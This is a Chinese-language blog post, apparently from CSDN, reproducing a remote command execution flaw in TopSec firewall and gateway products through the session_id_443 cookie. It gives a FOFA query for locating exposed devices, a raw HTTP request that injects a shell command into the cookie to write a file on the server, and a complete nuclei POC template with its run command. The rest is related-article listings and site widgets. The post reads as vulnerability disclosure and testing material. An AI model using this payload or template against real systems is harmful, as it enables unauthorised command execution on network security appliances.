天融信TOPSEC Cookie 远程命令执行漏洞

最新推荐文章于 2024-08-16 13:16:15 发布
最新推荐文章于 2024-08-16 13:16:15 发布
阅读量653 收藏 10
点赞数 12
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_71285176/article/details/135504899
版权

免责声明

文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行负责!

一、漏洞名称

天融信TOPSEC Cookie 远程命令执行漏洞

二、漏洞影响

天融信TOPSEC

三、漏洞描述

天融信TOPSEC解决方案包括综合管理系统,各类安全产品如防火墙、VPN、安全网关、宽带管理、入侵检测、内容过滤、个人安全套件以及综合安全审计系统等多种安全功能。该系统Cookie参数存在RCE漏洞,会导致服务器失陷。

四、FOFA搜索语句

title="Web User Login" && body="/cgi/maincgi.cgi?Url=VerifyCode"

五、漏洞复现

第一步,向靶场发送如下数据包,生成一个字符串写入文件

GET /cgi/maincgi.cgi?Url=aa HTTP/1.1Host: x.x.x.xCookie: session_id_443=1|echo 'nvgjngfszfzah1' > /www/htdocs/site/image/ecisas.txt;User-Agent: Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36

响应内容如下

HTTP/1.1 200 OKPragma: no-cacheSet-Cookie: session_id_443=deleted; expires=Sat, 01 Jan 2011 00:00:00 GMT;path=/;;session_id_443=deleted; expires=Sat, 01 Jan 2011 00:00:00 GMT;path=/cgi/;Content-Length: 122Content-Type: text/html; charset=gb2312Date: Tue, 26 Dec 2023 23:53:28 GMTServer: TOPSECCache-Control: no-cache<script>alert('操作超时');if(window.opener){window.opener.top.location='/';self.close();}else{top.location='/';}</script>

第二步,访问回显文件

https://x.x.x.x/site/image/xxx.txt

复现成功

六、POC

POC内容: 

id: topsec-maincgi-cookie-rceinfo:name: 天融信TOPSEC Cookie 远程命令执行漏洞author: fgzseverity: criticaldescription: 天融信TOPSEC解决方案包括综合管理系统,各类安全产品如防火墙、VPN、安全网关、宽带管理、入侵检测、内容过滤、个人安全套件以及综合安全审计系统等多种安全功能。该系统Cookie参数存在RCE漏洞,会导致服务器失陷。metadata:max-request: 1fofa-query: title="Web User Login" && body="/cgi/maincgi.cgi?Url=VerifyCode"verified: truevariables:file_name: "{{to_lower(rand_text_alpha(6))}}"file_content: "{{to_lower(rand_text_alpha(15))}}"requests:- raw:- |+GET /cgi/maincgi.cgi?Url=aa HTTP/1.1Host: {{Hostname}}Cookie: session_id_443=1|echo '{{file_content}}' > /www/htdocs/site/image/{{file_name}}.txt;User-Agent: Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36- |GET /site/image/{{file_name}}.txt HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36matchers:- type: dsldsl:- "status_code_1 == 200 && status_code_2 == 200 && contains(body_2, '{{file_content}}')"

运行POC

命令:nuclei.exe -t 选择脚本 -u 扫描地址

1704185703_6593cf677bacc60d4c099.png!small?1704185705195

七、修复建议

升级到最新版本

hacker?
关注
漏洞复现】天融信TOPSEC-static-convert-远程命令执行
知黑而守白
01-04 220
攻击者通过发送精心构造的恶意请求,利用了该漏洞,成功实现在目标系统上执行任意系统命令的攻击。成功利用漏洞的攻击者可在目标系统上执行恶意操作,可能导致数据泄露、系统瘫痪或远程控制。强烈建议立即更新系统以修复此漏洞,确保系统安全性。天融信TOPSEC解决方案包括综合管理系统,各类安全产品如防火墙、VPN、安全网关、宽带管理、入侵检测、内容过滤、个人安全套件以及综合安全审计系统等多种安全功能。更新至最新版本:确保你的系统版本处于最新状态。厂商通常会发布包含安全修复的更新,及时应用这些更新以确保系统的安全性。
漏洞复现】天融信TOPSEC static_convert 远程命令执行
失心少年
01-12 329
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!攻击者通过发送精心构造的恶意请求,利用了该漏洞,成功实现在目标系统上执行任意系统命令的攻击。成功利用漏洞的攻击者可在目标系统上执行恶意操作,可能导致数据泄露、系统瘫痪或远程控制。
天融信TOPSEC安全管理系统存在远程命令执行漏洞
3tefanie丶zhou的博客
01-02 1903
【陆上行舟。】
漏洞复现】Web user login存在RCE漏洞
最新发布
网安小白
08-16 414
Web user login存在RCE漏洞
天融信TOPSEC Cookie 远程命令执行漏洞复现
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
01-04 1153
天融信TOPSEC解决方案包括综合管理系统,各类安全产品如防火墙、VPN、安全网关、宽带管理、入侵检测、内容过滤、个人安全套件以及综合安全审计系统等多种安全功能。该系统Cookie 处存在RCE漏洞,会导致服务器失陷。
解决方案-天融信防火墙mgmt-新手漏洞教程
2401_84915584的博客
07-01 326
提供天融信防火墙配置指南文档免费下载,摘要:天融信防火墙配置指南一、对象与规则现在大多防火墙都采用了面向对象的设计。针对对象的行为进行的快速识别处理,就是规则。
漏洞复现-天融信TOPSEC安全管理系统远程命令执行漏洞(附漏洞检测脚本)
jjjj1029056414的博客
01-04 694
漏洞复现-天融信TOPSEC安全管理系统远程命令执行漏洞,附带自己写的poc脚本
漏洞复现】天融信TOPSEC-Cookie-远程命令执行
知黑而守白
01-04 183
天融信TOPSEC解决方案包括综合管理系统,各类安全产品如防火墙、VPN、安全网关、宽带管理、入侵检测、内容过滤、个人安全套件以及综合安全审计系统等多种安全功能。该系统Cookie 处存在RCE漏洞,会导致服务器失陷。天融信TOPSEC解决方案包括综合管理系统,各类安全产品如防火墙、VPN、安全网关、宽带管理、入侵检测、内容过滤、个人安全套件以及综合安全审计系统等多种安全功能。更新至最新版本:确保你的系统版本处于最新状态。厂商通常会发布包含安全修复的更新,及时应用这些更新以确保系统的安全性。
天融信TOPSEC static_convert 远程命令执行漏洞
weixin_43567873的博客
03-09 39
天融信TOPSEC static_convert 远程命令执行漏洞
天融信网络数据防泄漏系统(TopDLP-N)技术白皮书v4.1.doc
12-31
随着企业信息化的发展,信息系统越来越多的使用于日常工作中,成为不可或缺的工具和手段。通过企业信息化大大提高了企业生产效率,从 ERP 到SOA,成熟的企业已经越来越依赖于信息系统而运行发展并壮大;虚拟化、云计算等技术的发展更是为许多跨地区、跨国家的企业节约了大笔的专线费用,并且提供了信息传送的实时性、可靠性、保密性的保证。
漏洞复现】天融信TOPSEC安全管理系统远程命令执行漏洞
weixin_45530380的博客
01-02 1023
天融信TopSec 安全管理系统,是基于大数据架构,采用多种技术手段收集各类探针设备安全数据,围绕资产、漏洞、攻击、威胁等安全要素进行全面分析,提供统一监测告警、集中策略管控、协同处置流程,实现客户等保合规、资产统一管理、风险一键阻断等应用价值。该系统存在存在远程命令执行漏洞,通过此漏洞,攻击者可进行文件写入等危险操作,威胁系统安全。访问路径:/site/image/security.txt。
漏洞复现-天融信TOPSEC static_convert 远程命令执行漏洞(附漏洞检测脚本)
jjjj1029056414的博客
01-04 744
漏洞复现-天融信TOPSEC static_convert 远程命令执行漏洞,附带自己写的poc脚本
漏洞复现--天融信TOPSEC两处远程命令执行
wintercc1219的博客
02-04 587
天融信TOPSEC)是国内领先的网络安全解决方案提供商之一。他们专注于网络安全技术和产品的研发、生产和服务,为政府机构、企业和个人用户提供全面的网络安全解决方案。
cookie的用法
jh5485857的博客
08-08 703
cookie的用法
多家防火墙设备存在信息泄露漏洞
weixin_50464560的博客
06-18 1886
概述 漏洞名称 多家防火墙设备存在信息泄露漏洞安全通告 发布日期 2021-06-16 受影响产品及版本 胜鑫塔下一代防火墙XT6000-A-FW-1.0.0-0-2778 利谱第二代防火墙6164-1.5.2 任子行下一代防火墙SURF-NGSA-V-3000 中科网威下一代防火墙F6600L-1.5.2 任子行网络安全审计系统内置报表 网域科技防火墙ACF-200-1.0.0 锐捷RG-ISG视频监控网关6000-ISG02C 天融信ACM-51538-V3.0.0176 无锡城安C
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值